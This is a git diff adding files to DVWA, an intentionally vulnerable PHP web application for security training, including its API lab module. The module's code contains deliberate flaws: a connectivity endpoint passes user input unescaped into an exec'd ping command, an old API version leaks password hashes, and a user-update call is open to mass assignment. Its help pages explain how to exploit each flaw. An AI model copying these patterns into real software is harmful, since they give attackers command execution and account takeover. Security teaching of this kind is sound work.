+ + {$docMenuHtml} + + + {$instructions} + +' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '.' ); + if( $result && mysqli_num_rows( $result ) == 1 ) { // Login Successful... + dvwaMessagePush( "You have logged in as '{$user}'" ); + dvwaLogin( $user ); + dvwaRedirect( DVWA_WEB_PAGE_TO_ROOT . 'index.php' ); + } + + // Login failed + dvwaMessagePush( 'Login failed' ); + dvwaRedirect( 'login.php' ); +} + +$messagesHtml = messagesPopAllToHtml(); + +Header( 'Cache-Control: no-cache, must-revalidate'); // HTTP/1.1 +Header( 'Content-Type: text/html;charset=utf-8' ); // TODO- proper XHTML headers... +Header( 'Expires: Tue, 23 Jun 2009 12:00:00 GMT' ); // Date in the past + +// Anti-CSRF +generateSessionToken(); + +echo " + + + + + + + +
Try installing again.
+
+
+
+
+
+";
+
+?>
diff --git a/DVWA/logout.php b/DVWA/logout.php
new file mode 100644
index 00000000..07b65eb4
--- /dev/null
+++ b/DVWA/logout.php
@@ -0,0 +1,17 @@
+
diff --git a/DVWA/php.ini b/DVWA/php.ini
new file mode 100644
index 00000000..f4707128
--- /dev/null
+++ b/DVWA/php.ini
@@ -0,0 +1,5 @@
+; This file attempts to overwrite the original php.ini file. Doesnt always work.
+
+magic_quotes_gpc = Off
+allow_url_fopen = on
+allow_url_include = on
diff --git a/DVWA/phpinfo.php b/DVWA/phpinfo.php
new file mode 100644
index 00000000..1c34a21d
--- /dev/null
+++ b/DVWA/phpinfo.php
@@ -0,0 +1,10 @@
+
diff --git a/DVWA/robots.txt b/DVWA/robots.txt
new file mode 100644
index 00000000..77470cb3
--- /dev/null
+++ b/DVWA/robots.txt
@@ -0,0 +1,2 @@
+User-agent: *
+Disallow: /
\ No newline at end of file
diff --git a/DVWA/security.php b/DVWA/security.php
new file mode 100644
index 00000000..2652d932
--- /dev/null
+++ b/DVWA/security.php
@@ -0,0 +1,82 @@
+Security level is currently: $securityLevel.
+
+
+ +
+ +
+
+ + +
+ +
+
+
+
+
+ + {$messagesHtml} + +
+
+
+
+
+
+
+
+ +
+
+
+
+ + + {$messagesHtml} + +
+
+
+
+
+
+
+
+ +
"; + } + $securityOptionsHtml .= ""; +} + +// Anti-CSRF +generateSessionToken(); + +$page[ 'body' ] .= " +
+ DVWA Security
+
+ +
";
+
+dvwaHtmlEcho( $page );
+
+?>
diff --git a/DVWA/security.txt b/DVWA/security.txt
new file mode 100644
index 00000000..671e87d5
--- /dev/null
+++ b/DVWA/security.txt
@@ -0,0 +1 @@
+The clue is in its name, DVWA contains both intentional and unintentional vulnerabliities, that is it's whole point, please do not try to report them.
diff --git a/DVWA/setup.php b/DVWA/setup.php
new file mode 100644
index 00000000..79a011de
--- /dev/null
+++ b/DVWA/setup.php
@@ -0,0 +1,156 @@
+UnknownDVWA Security
+ + +
Security Level
+ + {$securityHtml} + + +"; +$mod_rewrite = "Unknown
"; + +if (PHP_OS == "Linux") { + if (is_dir (".git")) { + $git_log = shell_exec ("git -c 'safe.directory=*' log -1"); + if (!is_null ($git_log)) { + $tmp = explode ("\n", $git_log); + $date = str_replace ("Date: ", "Date: ", $tmp[2]); + $git_ref = "
- " . str_replace ("commit ", "Git reference: ", $tmp[0]) . "
- " . $date . "
"; + } else { + $mod_rewrite = "Enabled
"; + } +} + +if (!is_dir ("./vulnerabilities/api/vendor")) { + $vendor = "Not Installed
"; + $vendor .= "For information on how to install these, see the README.
"; +} else { + $vendor = "Installed
"; +} + +$phpVersionWarning = ""; + +if (version_compare(phpversion(), '6', '<')) { + $phpVersionWarning = "Versions of PHP below 7.x are not supported, please upgrade.
"; +} elseif (version_compare(phpversion(), '7.3', '<')) { + $phpVersionWarning = "Versions of PHP below 7.3 may work but have known problems, please upgrade.
"; +} + +$page[ 'body' ] .= " +
+ Database Setup
+
+
+
+ +
+ {$DVWAOS}
+
+ DVWA version: {$git_ref} +
+ {$DVWARecaptcha}
+
+ {$DVWAUploadsWrite}
+ {$bakWritable} +
+
+ + Apache
+ {$SERVER_NAME}
+ mod_rewrite: {$mod_rewrite} + mod_rewrite is required for the AP labs.
+ + PHP
+ PHP version: " . phpversion() . "
+ {$phpVersionWarning} + {$phpDisplayErrors}
+ {$phpDisplayStartupErrors}
+ {$phpURLInclude}
+ {$phpURLFopen}
+ {$phpGD}
+ {$phpMySQL}
+ {$phpPDO}
+
+ Database
+ Backend database: {$database_type_name}
+ {$MYSQL_USER}
+ {$MYSQL_PASS}
+ {$MYSQL_DB}
+ {$MYSQL_SERVER}
+ {$MYSQL_PORT}
+
+ API
+ This section is only important if you want to use the API module.
+ Vendor files installed: {$vendor}
+ + Status in red, indicate there will be an issue when trying to complete some modules.
+
+ If you see disabled on either allow_url_fopen or allow_url_include, set the following in your php.ini file and restart Apache.
+
+ + + +
+
+
";
+
+dvwaHtmlEcho( $page );
+
+?>
diff --git a/DVWA/tests/README.md b/DVWA/tests/README.md
new file mode 100644
index 00000000..31f34892
--- /dev/null
+++ b/DVWA/tests/README.md
@@ -0,0 +1,14 @@
+# Tests
+
+## Usage
+
+To run these scripts manually, run the following from the document root:
+
+```
+python3 -m pytest -s
+```
+
+## test_url.py
+
+This test will find all fully qualified URLs mentioned in any PHP script and will check if the URL is still alive. This helps weed out dead links from documentation and references.
+
diff --git a/DVWA/tests/test_url.py b/DVWA/tests/test_url.py
new file mode 100644
index 00000000..af27d21b
--- /dev/null
+++ b/DVWA/tests/test_url.py
@@ -0,0 +1,90 @@
+import glob
+import re
+import requests
+import time
+
+
+def get_php_files():
+ patterns = ["*.php", "*/*.php", "*/*/*.php"]
+ files = []
+ ignore_files = ["dvwa/includes/Parsedown.php"]
+ for pattern in patterns:
+ files.extend(glob.glob(pattern))
+ for ignore_file in ignore_files:
+ if ignore_file in files:
+ files.remove(ignore_file)
+ return files
+
+
+def get_urls(filename):
+ with open(filename, 'r') as f:
+ content = f.read()
+ matches = re.findall("[\'\"](https?://.*?)[\'\"]", content)
+ return matches
+
+
+def check_once(url):
+ try:
+ headers = {
+ 'User-Agent':
+ 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'
+ }
+ response = requests.get(url, headers=headers)
+ except requests.exceptions.ConnectionError:
+ return False, -1
+ return response.ok, response.status_code
+
+
+def check(url):
+ # We try for 5 times, with 3 seconds interval.
+ try_count = 5
+ try_interval = 3
+ for i in range(try_count):
+ ok, status_code = check_once(url)
+ if ok:
+ break
+ time.sleep(try_interval)
+ return ok, status_code
+
+
+def test_url():
+ # Need to rewrite this so it generates a single, unique list of URLs,
+ # removes any which are to be ignored, and then checks them. Would be
+ # much cleaner.
+
+ ignore_urls = [
+ "https://wpscan.com/", # Cloudflare doesn't like GitHub checking it
+ "http://www.w3.org/TR/html4/loose.dtd", # Don't need to check the DTD
+ "https://www.vmware.com/", # Throwing a 403 for some reason, but can't see it going anywhere
+ "https://twitter.com/digininja", # Twitter doesn't like GitHub checking it
+ "https://www.cgisecurity.com/xss-faq.html", # Throwing a 403 for some reason, but can't see it going anywhere
+ "https://www.cgisecurity.com/csrf-faq.html", # Throwing a 403 for some reason, but can't see it going anywhere
+ ]
+ all_urls = []
+ broken_urls = []
+ for php_file in get_php_files():
+ for url in get_urls(php_file):
+ all_urls.append(url)
+
+ # This removes any duplicates
+ dedup_urls = list(dict.fromkeys(all_urls))
+
+ for url in dedup_urls:
+ if not url in ignore_urls:
+ # print("checking %s" % url)
+ ok, status_code = check(url)
+ if not ok:
+ # The php_file variable is now broken as it was set in a previous loop
+ # and doesn't come across into this one.
+
+ #print("failed to access %s from file %s with code %d" % (url, php_file, status_code))
+ # broken_urls.append((php_file, url, status_code))
+ broken_urls.append((url, status_code))
+
+ #for php_file, url, status_code in broken_urls:
+ # print("%s\t%s\t%d" % (php_file, url, status_code))
+
+ for url, status_code in broken_urls:
+ print("%s\t%d" % (url, status_code))
+
+ assert len(broken_urls) == 0, "Broken URLs Detected."
diff --git a/DVWA/vulnerabilities/api/.gitignore b/DVWA/vulnerabilities/api/.gitignore
new file mode 100644
index 00000000..48b8bf90
--- /dev/null
+++ b/DVWA/vulnerabilities/api/.gitignore
@@ -0,0 +1 @@
+vendor/
diff --git a/DVWA/vulnerabilities/api/.htaccess b/DVWA/vulnerabilities/api/.htaccess
new file mode 100644
index 00000000..f0350352
--- /dev/null
+++ b/DVWA/vulnerabilities/api/.htaccess
@@ -0,0 +1,10 @@
+Database Setup
+
+ Click on the 'Create / Reset Database' button below to create or reset your database.
+ If you get an error make sure you have the correct user credentials in: " . realpath( getcwd() . DIRECTORY_SEPARATOR . "config" . DIRECTORY_SEPARATOR . "config.inc.php" ) . "
If the database already exists, it will be cleared and the data will be reset.
+ You can also use this to reset the administrator credentials (\"admin // password\") at any stage.
+
+ +
Setup Check
+ + General+ {$DVWAOS}
+
+ DVWA version: {$git_ref} +
+ {$DVWARecaptcha}
+
+ {$DVWAUploadsWrite}
+ {$bakWritable} +
+
+ + Apache
+ {$SERVER_NAME}
+ mod_rewrite: {$mod_rewrite} + mod_rewrite is required for the AP labs.
+ + PHP
+ PHP version: " . phpversion() . "
+ {$phpVersionWarning} + {$phpDisplayErrors}
+ {$phpDisplayStartupErrors}
+ {$phpURLInclude}
+ {$phpURLFopen}
+ {$phpGD}
+ {$phpMySQL}
+ {$phpPDO}
+
+ Database
+ Backend database: {$database_type_name}
+ {$MYSQL_USER}
+ {$MYSQL_PASS}
+ {$MYSQL_DB}
+ {$MYSQL_SERVER}
+ {$MYSQL_PORT}
+
+ API
+ This section is only important if you want to use the API module.
+ Vendor files installed: {$vendor}
+ + Status in red, indicate there will be an issue when trying to complete some modules.
+
+ If you see disabled on either allow_url_fopen or allow_url_include, set the following in your php.ini file and restart Apache.
+
allow_url_fopen = On
+allow_url_include = On+ + + +
+
+
+
diff --git a/DVWA/vulnerabilities/api/index.php b/DVWA/vulnerabilities/api/index.php
new file mode 100644
index 00000000..5e03e8fa
--- /dev/null
+++ b/DVWA/vulnerabilities/api/index.php
@@ -0,0 +1,71 @@
+Warning, mod_rewrite is not enabledHelp - API Security
+ +
+
+
+
+
+
+
+ About++ Most modern web apps use some kind of API, either as Single Page Apps (SPAs) or to retrieve data to populate traditional apps. As these APIs are behind the scenes, developers sometimes feel they can cut corners in areas such as authentication, authorisation or data validation. As testers, we can get behind the curtains and directly access these seemingly hidden calls to take advantage of these weaknesses. + ++ This module will look at three weaknesses, versioning, mass assignment, and ..... + + ++ + Objective+Each level has its own objective but the general idea is to exploit weak API implementations. + ++ + Low Level+The call being made by the JavaScript is for version 2 of the endpoint, could there be other, earlier, versions available? ++ + +
+
+
+ Either by looking at the JavaScript or watching network traffic, you should notice that there is a call being made to
+ As the call is being made against version two ( + Whatever approach you try, by accessing version one of the endpoint, you should be able to see the password hashes as part of the data. + +Medium Level++ Look at the call made by the site, but also look at the swagger docs and see if there are any other parameters you might be able to add that are not currently passed. + ++ + +
+
+
+ When you update your name, a PUT request is made to
+ If you look at the swagger docs, the definition for
+ Which is what you are currently passing, but if you have a look at
+ Notice the extra + In situations like this, it is always worth testing to see if extra parameters which exist on similar calls will also work on the one you are working on. + + +
+ To try this, you can either intercept the request in a proxy, or you can modify the JSON before the request is sent to the server. To modify it in the page, you can set a breakpoint in the + If you do this and then check the JSON sent in the PUT request, you should see: + + ++ And hopefully a congratulations message. + +High Level+Import the four health calls into your testing tool of choice and make sure they are running properly. When they are all working, test them for vulnerabilities. + ++ + + +
+
+
+ The connectivity call takes a target parameter and pings it to check for a connection, this is done by calling the OS ping command and is vulnerable to command injection. ++ For more information on how to exploit this type of issue, see the command injection module. + +Impossible Level++ The challenge here is just to get the login process automated in Postman or your tool of choice. Read the documentation and experiment. To help get things working I piped everything through Burp and watched each call as it was made to see if it matched what I expected. + +
+ When the flow works correctly, the initial login will return an access token and a refresh token along with an + It should be noted that as well as the access token having a fixed lifespan, the refresh token also has a fixed lifespan, once it has expired, the login process has to begin again from scratch. + + |
+
"; + $html .= "See the README for more information.
"; + } +} + +if (!is_dir ("./vendor")) { + $html .= "Warning, composer has not been run.
"; + $html .= "See the README for more information.
"; +} + + +require_once DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/api/source/{$vulnerabilityFile}"; + +$page[ 'body' ] .= "
+
\n";
+
+dvwaHtmlEcho( $page );
+
+?>
+
diff --git a/DVWA/vulnerabilities/api/openapi.yml b/DVWA/vulnerabilities/api/openapi.yml
new file mode 100644
index 00000000..837d40ae
--- /dev/null
+++ b/DVWA/vulnerabilities/api/openapi.yml
@@ -0,0 +1,435 @@
+openapi: 3.0.0
+info:
+ title: 'DVWA API'
+ contact:
+ url: 'https://github.com/digininja/DVWA/'
+ email: robin@digi.ninja
+ version: '0.1'
+servers:
+ -
+ url: 'http://dvwa.test'
+ description: 'API server'
+paths:
+ /vulnerabilities/api/v2/health/echo:
+ post:
+ tags:
+ - health
+ description: 'Echo, echo, cho, cho, o o ....'
+ operationId: echo
+ requestBody:
+ description: 'Your words.'
+ content:
+ application/json:
+ schema:
+ $ref: '#/components/schemas/Words'
+ responses:
+ '200':
+ description: 'Successful operation.'
+ /vulnerabilities/api/v2/health/connectivity:
+ post:
+ tags:
+ - health
+ description: 'The server occasionally loses connectivity to other systems and so this can be used to check connectivity status.'
+ operationId: checkConnectivity
+ requestBody:
+ description: 'Remote host.'
+ content:
+ application/json:
+ schema:
+ $ref: '#/components/schemas/Target'
+ responses:
+ '200':
+ description: 'Successful operation.'
+ /vulnerabilities/api/v2/health/status:
+ get:
+ tags:
+ - health
+ description: 'Get the health of the system.'
+ operationId: getHealthStatus
+ responses:
+ '200':
+ description: 'Successful operation.'
+ /vulnerabilities/api/v2/health/ping:
+ get:
+ tags:
+ - health
+ description: 'Simple ping/pong to check connectivity.'
+ operationId: ping
+ responses:
+ '200':
+ description: 'Successful operation.'
+ /vulnerabilities/api/v2/login/login:
+ post:
+ tags:
+ - login
+ description: 'Login as user.'
+ operationId: login
+ requestBody:
+ description: 'The login credentials.'
+ content:
+ application/json:
+ schema:
+ $ref: '#/components/schemas/Credentials'
+ responses:
+ '200':
+ description: 'Successful operation.'
+ '401':
+ description: 'Invalid credentials.'
+ /vulnerabilities/api/v2/login/check_token:
+ post:
+ tags:
+ - login
+ description: 'Check a token is valid.'
+ operationId: check_token
+ requestBody:
+ description: 'The token to test.'
+ content:
+ application/json:
+ schema:
+ $ref: '#/components/schemas/Token'
+ responses:
+ '200':
+ description: 'Successful operation.'
+ '401':
+ description: 'Token is invalid.'
+ '/vulnerabilities/api/v2/order/{id}':
+ get:
+ tags:
+ - order
+ description: 'Get a order by ID.'
+ operationId: getOrderByID
+ parameters:
+ -
+ name: id
+ in: path
+ required: true
+ schema:
+ type: integer
+ responses:
+ '200':
+ description: 'Successful operation.'
+ content:
+ application/json:
+ schema:
+ $ref: '#/components/schemas/Order'
+ '404':
+ description: 'Order not found.'
+ security:
+ -
+ scalar: basicAuth
+ put:
+ tags:
+ - order
+ description: 'Update an order by ID.'
+ operationId: updateOrder
+ parameters:
+ -
+ name: id
+ in: path
+ required: true
+ schema:
+ type: integer
+ requestBody:
+ description: 'New order data.'
+ content:
+ application/json:
+ schema:
+ $ref: '#/components/schemas/OrderUpdate'
+ responses:
+ '200':
+ description: 'Successful operation.'
+ content:
+ application/json:
+ schema:
+ $ref: '#/components/schemas/Order'
+ '404':
+ description: 'Order not found'
+ '422':
+ description: 'Invalid order object provided'
+ delete:
+ tags:
+ - order
+ description: 'Delete order by ID.'
+ operationId: deleteOrderById
+ parameters:
+ -
+ name: id
+ in: path
+ required: true
+ schema:
+ type: integer
+ responses:
+ '200':
+ description: 'Successful operation.'
+ '404':
+ description: 'Order not found'
+ /vulnerabilities/api/v2/order/:
+ get:
+ tags:
+ - order
+ description: 'Get all orders.'
+ operationId: getOrders
+ responses:
+ '200':
+ description: 'Successful operation.'
+ content:
+ application/json:
+ schema:
+ type: array
+ items:
+ $ref: '#/components/schemas/Order'
+ post:
+ tags:
+ - order
+ description: 'Create a new order.'
+ operationId: addOrder
+ requestBody:
+ description: 'Order data.'
+ content:
+ application/json:
+ schema:
+ $ref: '#/components/schemas/OrderAdd'
+ responses:
+ '200':
+ description: 'Successful operation.'
+ content:
+ application/json:
+ schema:
+ $ref: '#/components/schemas/Order'
+ '422':
+ description: 'Invalid order object provided'
+ '/vulnerabilities/api/v2/user/{id}':
+ get:
+ tags:
+ - user
+ description: 'Get a user by ID.'
+ operationId: getUserByID
+ parameters:
+ -
+ name: id
+ in: path
+ required: true
+ schema:
+ type: integer
+ responses:
+ '200':
+ description: 'Successful operation.'
+ content:
+ application/json:
+ schema:
+ $ref: '#/components/schemas/User'
+ '404':
+ description: 'User not found.'
+ put:
+ tags:
+ - user
+ description: 'Update a user by ID.'
+ operationId: updateUser
+ parameters:
+ -
+ name: id
+ in: path
+ required: true
+ schema:
+ type: integer
+ requestBody:
+ description: 'New user data.'
+ content:
+ application/json:
+ schema:
+ $ref: '#/components/schemas/UserUpdate'
+ responses:
+ '200':
+ description: 'Successful operation.'
+ content:
+ application/json:
+ schema:
+ $ref: '#/components/schemas/User'
+ '404':
+ description: 'User not found'
+ '422':
+ description: 'Invalid user object provided'
+ delete:
+ tags:
+ - user
+ description: 'Delete user by ID.'
+ operationId: deleteUserById
+ parameters:
+ -
+ name: id
+ in: path
+ required: true
+ schema:
+ type: integer
+ responses:
+ '200':
+ description: 'Successful operation.'
+ '404':
+ description: 'User not found'
+ /vulnerabilities/api/v2/user/:
+ get:
+ tags:
+ - user
+ description: 'Get all users.'
+ operationId: getUsers
+ responses:
+ '200':
+ description: 'Successful operation.'
+ content:
+ application/json:
+ schema:
+ type: array
+ items:
+ $ref: '#/components/schemas/User'
+ post:
+ tags:
+ - user
+ description: 'Create a new user.'
+ operationId: addUser
+ requestBody:
+ description: 'User data.'
+ content:
+ application/json:
+ schema:
+ $ref: '#/components/schemas/UserAdd'
+ responses:
+ '200':
+ description: 'Successful operation.'
+ content:
+ application/json:
+ schema:
+ $ref: '#/components/schemas/User'
+ '422':
+ description: 'Invalid user object provided'
+components:
+ schemas:
+ Target:
+ required:
+ - target
+ properties:
+ target:
+ type: string
+ example: digi.ninja
+ type: object
+ Words:
+ required:
+ - words
+ properties:
+ words:
+ type: string
+ example: 'Hello World'
+ type: object
+ Credentials:
+ required:
+ - username
+ - password
+ properties:
+ username:
+ type: string
+ example: user
+ password:
+ type: string
+ example: password
+ type: object
+ Order:
+ properties:
+ id:
+ type: integer
+ example: 1
+ name:
+ type: string
+ example: 'Tony Hart'
+ address:
+ type: string
+ example: 'BBC Television Centre, London W3 6XZ'
+ items:
+ type: string
+ example: '1 * brush, 2 * paints, 1 * easel'
+ status:
+ type: integer
+ example: 1
+ type: object
+ OrderAdd:
+ required:
+ - level
+ - name
+ properties:
+ name:
+ type: string
+ example: fred
+ address:
+ type: string
+ example: '1 High Street, Atown'
+ items:
+ type: string
+ example: '2 * brushes'
+ type: object
+ OrderUpdate:
+ properties:
+ name:
+ type: string
+ example: fred
+ address:
+ type: string
+ example: '1 High Street, Atown'
+ items:
+ type: string
+ example: '2 * brushes'
+ type: object
+ Token:
+ required:
+ - token
+ properties:
+ token:
+ type: string
+ example: '11111'
+ type: object
+ User:
+ properties:
+ id:
+ type: integer
+ example: 1
+ name:
+ type: string
+ example: fred
+ level:
+ type: integer
+ example: 1
+ type: object
+ UserAdd:
+ required:
+ - level
+ - name
+ properties:
+ name:
+ type: string
+ example: fred
+ level:
+ type: integer
+ example: 1
+ type: object
+ UserUpdate:
+ required:
+ - name
+ properties:
+ name:
+ type: string
+ example: fred
+ type: object
+ securitySchemes:
+ http:
+ type: http
+ name: authorization
+tags:
+ -
+ name: user
+ description: 'User operations.'
+ -
+ name: health
+ description: 'Health operations.'
+ -
+ name: order
+ description: 'Order operations.'
+ -
+ name: login
+ description: 'Login operations.'
diff --git a/DVWA/vulnerabilities/api/public/index.php b/DVWA/vulnerabilities/api/public/index.php
new file mode 100644
index 00000000..36aebd36
--- /dev/null
+++ b/DVWA/vulnerabilities/api/public/index.php
@@ -0,0 +1,100 @@
+ $dir) {
+ if ($dir == "order" || $dir == "user" || $dir == "health" || $dir == "login") {
+ $local_uri = array_slice ($uri, $pos - 1);
+ break;
+ }
+}
+
+// All of our endpoints start with /api/v[0-9]
+// everything else results in a 404 Not Found
+
+if (count($local_uri) < 2) {
+ header("HTTP/1.1 404 Not Found");
+ exit();
+}
+
+$requestMethod = $_SERVER["REQUEST_METHOD"];
+
+$version = $local_uri[0];
+
+if (preg_match ("/v([0-9]*)/", $version, $matches)) {
+ $version = intval ($matches[1]);
+} else {
+ header("HTTP/1.1 404 Not Found");
+ exit();
+}
+$controller = $local_uri[1];
+
+switch ($controller) {
+ case "order":
+ // the user id is, of course, optional and must be a number:
+ $orderId = null;
+ if (isset($local_uri[2]) && $local_uri[2] != "") {
+ $orderId = intval($local_uri[2]);
+ }
+
+ // pass the request method and order ID to the OrderController and process the HTTP request:
+ $controller = new OrderController($requestMethod, $version, $orderId);
+ $controller->processRequest();
+ break;
+ case "user":
+ // the user id is, of course, optional and must be a number:
+ $userId = null;
+ if (isset($local_uri[2])) {
+ $userId = (int) $local_uri[2];
+ }
+
+ // pass the request method and user ID to the UserController and process the HTTP request:
+ $controller = new UserController($requestMethod, $version, $userId);
+ $controller->processRequest();
+ break;
+ case "health":
+ if (!isset($local_uri[2])) {
+ $gc = new GenericController("notFound");
+ $gc->processRequest();
+ break;
+ }
+
+ $command = $local_uri[2];
+ $controller = new HealthController($requestMethod, $version, $command);
+ $controller->processRequest();
+ break;
+ case "login":
+ if (!isset($local_uri[2])) {
+ $gc = new GenericController("notFound");
+ $gc->processRequest();
+ break;
+ }
+
+ $command = $local_uri[2];
+ $controller = new LoginController($requestMethod, $version, $command);
+ $controller->processRequest();
+ break;
+ default:
+ $gc = new GenericController("notFound");
+ $gc->processRequest();
+ break;
+}
diff --git a/DVWA/vulnerabilities/api/source/high.php b/DVWA/vulnerabilities/api/source/high.php
new file mode 100644
index 00000000..61b3a243
--- /dev/null
+++ b/DVWA/vulnerabilities/api/source/high.php
@@ -0,0 +1,14 @@
+
+ Here is the OpenAPI document, have a look the health functions and see if you can find one that has a vulnerability.
+
+ Vulnerability: API Security
+ +
+";
+
+$page[ 'body' ] .= "
+ {$html}
+
+
+ More Information
+-
+
- " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/12-API_Testing/00-API_Testing_Overview', "OWASP WSTG API Testing Overview" ) . " +
- " . dvwaExternalLinkUrlGet( 'https://portswigger.net/bappstore/6bf7574b632847faaaa4eb5e42f1757c', "Burp OpenAPI Parser" ) . " +
- " . dvwaExternalLinkUrlGet( 'https://www.zaproxy.org/docs/desktop/addons/openapi-support/', "ZAP OpenAPI Support" ) . " +
- " . dvwaExternalLinkUrlGet( 'https://swagger.io/tools/swagger-ui/', "Swagger UI" ) . " +
- " . dvwaExternalLinkUrlGet( 'https://www.postman.com/', "Postman" ) . " +
+ You might be able to work out how to call the individual functions by hand, but it would be a lot easier to import it into an application such as Swagger UI, Burp, ZAP, or Postman and let the tool do the hard work of setting the requests up for you. +
+"; + +?> diff --git a/DVWA/vulnerabilities/api/source/impossible.php b/DVWA/vulnerabilities/api/source/impossible.php new file mode 100644 index 00000000..aec173b9 --- /dev/null +++ b/DVWA/vulnerabilities/api/source/impossible.php @@ -0,0 +1,22 @@ + + Rather than try to develop a perfect API, there is a different type of challenge for this level. + ++ The order system uses OAuth 2.0 for authentication. Being able to automate using this in your tools will greatly help with efficiency, removing the need to manually login and copy access tokens around. Use this level to practice setting up OAuth 2.0 in your testing tool of choice, for me this is Postman which is then proxied through Burp, but you can pick whatever tools are most appropriate for your testing environment. +
++ Here are some guides that might help: +
+ + +"; + +?> diff --git a/DVWA/vulnerabilities/api/source/low.php b/DVWA/vulnerabilities/api/source/low.php new file mode 100644 index 00000000..e1123e35 --- /dev/null +++ b/DVWA/vulnerabilities/api/source/low.php @@ -0,0 +1,118 @@ + + Versioning is important in APIs, running multiple versions of an API can allow for backward compatibility and can allow new services to be added without affecting existing users. The downside to keeping old versions alive is when those older versions contain vulnerabilities. + +"; + +$html .= " + +"; + +$html .= " + ++ Look at the call used to create this table and see if you can exploit it to return some additional information. +
+ + +"; + +?> diff --git a/DVWA/vulnerabilities/api/source/medium.php b/DVWA/vulnerabilities/api/source/medium.php new file mode 100644 index 00000000..2c980de1 --- /dev/null +++ b/DVWA/vulnerabilities/api/source/medium.php @@ -0,0 +1,95 @@ + + function update_username(user_json) { + console.log(user_json); + var user_info = document.getElementById ('user_info'); + var name_input = document.getElementById ('name'); + + if (user_json.name == '') { + user_info.innerHTML = 'User details: unknown user'; + name_input.value = 'unknown'; + } else { + var level = 'unknown'; + if (user_json.level == 0) { + level = 'admin'; + successDiv = document.getElementById ('message'); + successDiv.style.display = 'block'; + } else { + level = 'user'; + } + user_info.innerHTML = 'User details: ' + user_json.name + ' (' + level + ')'; + name_input.value = user_json.name; + } + } + + function get_user() { + const url = '/vulnerabilities/api/v2/user/2'; + + fetch(url, { + method: 'GET', + }) + .then(response => { + if (!response.ok) { + throw new Error('Network response was not ok'); + } + return response.json(); + }) + .then(data => { + update_username (data); + }) + .catch(error => { + console.error('There was a problem with your fetch operation:', error); + }); + } + + function update_name() { + const url = '/vulnerabilities/api/v2/user/2'; + const name = document.getElementById ('name').value; + const data = JSON.stringify({name: name}); + + fetch(url, { + method: 'PUT', + headers: { + 'Content-Type': 'application/json' + }, + body: data + }) + .then(response => { + if (!response.ok) { + throw new Error('Network response was not ok'); + } + return response.json(); + }) + .then(data => { + update_username(data); + }) + .catch(error => { + console.error('There was a problem with your fetch operation:', error); + }); + } + +"; + +$html .= " ++ Look at the call used to update your name and exploit it to elevate your user to admin (level 0). +
+ + + + +"; + +?> diff --git a/DVWA/vulnerabilities/api/src/GenericController.php b/DVWA/vulnerabilities/api/src/GenericController.php new file mode 100644 index 00000000..c1fa518c --- /dev/null +++ b/DVWA/vulnerabilities/api/src/GenericController.php @@ -0,0 +1,80 @@ +command = $command; + } + + private function optionsResponse() { + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = null; + return $response; + } + + private function unprocessableEntityResponse() + { + $response['status_code_header'] = 'HTTP/1.1 422 Unprocessable Entity'; + $response['body'] = json_encode([ + 'error' => 'Invalid input' + ]); + return $response; + } + + private function notFoundResponse() { + $response['status_code_header'] = 'HTTP/1.1 404 Not Found'; + $response['body'] = null; + return $response; + } + + private function methodNotSupported() { + $response['status_code_header'] = 'HTTP/1.1 405 Method Not Supported'; + $response['body'] = null; + return $response; + } + + private function teapotResponse() { + $response['status_code_header'] = "HTTP/1.1 418 I'm a teapot"; + $response['body'] = null; + return $response; + } + + public function processRequest() { + switch ($this->command) { + case "teapot": + $response = $this->teapotResponse(); + break; + case "notfound": + $response = $this->notFoundResponse(); + break; + case "notSupported": + $response = $this->methodNotSupported(); + break; + case "unprocessable": + $response = $this->unprocessableEntityResponse(); + break; + case "options": + $response = $this->optionsResponse(); + break; + default: + $response = $this->notFoundResponse(); + break; + }; + header($response['status_code_header']); + if ($response['body']) { + echo $response['body']; + } + exit(); + } +} diff --git a/DVWA/vulnerabilities/api/src/HealthController.php b/DVWA/vulnerabilities/api/src/HealthController.php new file mode 100644 index 00000000..e828505e --- /dev/null +++ b/DVWA/vulnerabilities/api/src/HealthController.php @@ -0,0 +1,200 @@ +requestMethod = $requestMethod; + $this->command = $command; + } + + #[OAT\Post( + tags: ["health"], + path: '/vulnerabilities/api/v2/health/echo', + operationId: 'echo', + description: 'Echo, echo, cho, cho, o o ....', + parameters: [ + new OAT\RequestBody ( + description: 'Your words.', + content: new OAT\MediaType( + mediaType: 'application/json', + schema: new OAT\Schema(ref: Words::class) + ) + ), + + ], + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + ), + ] + ) + ] + + private function echo() { + $input = (array) json_decode(file_get_contents('php://input'), TRUE); + if (array_key_exists ("words", $input)) { + $words = $input['words']; + + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = json_encode (array ("reply" => $words)); + } else { + $response['status_code_header'] = 'HTTP/1.1 500 Internal Server Error'; + $response['body'] = json_encode (array ("status" => "Words not specified")); + } + return $response; + } + + #[OAT\Post( + tags: ["health"], + path: '/vulnerabilities/api/v2/health/connectivity', + operationId: 'checkConnectivity', + description: 'The server occasionally loses connectivity to other systems and so this can be used to check connectivity status.', + parameters: [ + new OAT\RequestBody ( + description: 'Remote host.', + content: new OAT\MediaType( + mediaType: 'application/json', + schema: new OAT\Schema(ref: Target::class) + ) + ), + + ], + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + ), + ] + ) + ] + + private function checkConnectivity() { + $input = (array) json_decode(file_get_contents('php://input'), TRUE); + if (array_key_exists ("target", $input)) { + $target = $input['target']; + + exec ("ping -c 4 " . $target, $output, $ret_var); + + if ($ret_var == 0) { + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = json_encode (array ("status" => "OK")); + } else { + $response['status_code_header'] = 'HTTP/1.1 500 Internal Server Error'; + $response['body'] = json_encode (array ("status" => "Connection failed")); + } + } else { + $response['status_code_header'] = 'HTTP/1.1 500 Internal Server Error'; + $response['body'] = json_encode (array ("status" => "Target not specified")); + } + return $response; + } + + #[OAT\Get( + tags: ["health"], + path: '/vulnerabilities/api/v2/health/status', + operationId: 'getHealthStatus', + description: 'Get the health of the system.', + responses: [ + new OAT\Response( + 